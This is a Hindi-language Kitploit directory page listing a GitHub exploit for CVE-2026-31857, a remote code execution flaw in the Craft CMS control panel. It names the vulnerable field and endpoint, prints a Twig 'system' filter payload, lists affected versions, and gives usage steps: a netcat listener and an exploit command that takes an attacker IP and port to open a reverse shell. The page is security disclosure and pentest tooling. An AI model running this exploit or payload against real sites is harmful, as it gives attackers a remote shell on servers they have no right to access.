Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-31857 — Craft CMS में कंट्रोल पैनल में रिलेशनल कंडीशनल्स के माध्यम से RCE | Kitploit
उपकरण/GitHubGitHub/0xtatsuki/cve-2026-31857
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHub0xtatsuki/cve-2026-31857

CVE-2026-31857

Craft CMS में कंट्रोल पैनल में रिलेशनल कंडीशनल्स के माध्यम से RCE

1 दिन पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-31857 - Craft CMS RCE एक्सप्लॉइट

Craft CMS एडमिन पैनल में एक RCE कमज़ोरी के लिए Python एक्सप्लॉइट, जो admin/actions/element-indexes/count-elements एंडपॉइंट के माध्यम से ट्रिगर होती है। यह इंजेक्शन RelatedToConditionRule कंडीशन के elementIds फ़ील्ड के ज़रिए होता है, जिसे सर्वर-साइड पर Twig के रूप में इंटरप्रेट किया जाता है और system फ़िल्टर के ज़रिए मनमाना कमांड चलाने के लिए दुरुपयोग किया जाता है ({{[['<cmd>']|filter('system')]}})।

कमज़ोरी का खुलासा NeoSprings द्वारा किया गया

प्रभावित संस्करण :

  • >= 5.0.0-RC1, <= 5.9.8
  • >= 4.0.0-beta.1, <= 4.17.3

संदर्भ :

  • https://github.com/craftcms/cms/security/advisories/GHSA-fp5j-j7j4-mcxc
  • https://nvd.nist.gov/vuln/detail/cve-2026-31857

इंस्टॉलेशन

$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt

उपयोग

  1. एक्सप्लॉइट चलाने से पहले लिसनर शुरू करें :
$ nc -lvnp <attacker_port>
  1. एक्सप्लॉइट चलाएँ :
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>

डिस्क्लेमर

यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत अभ्यासों (CTF, अनुबंधित पेनिट्रेशन टेस्टिंग या स्थानीय परीक्षण) के लिए प्रदान किया गया है। स्पष्ट अनुमति के बिना किसी भी सिस्टम के विरुद्ध इसका उपयोग करना अवैध है।

टूल डाउनलोड करें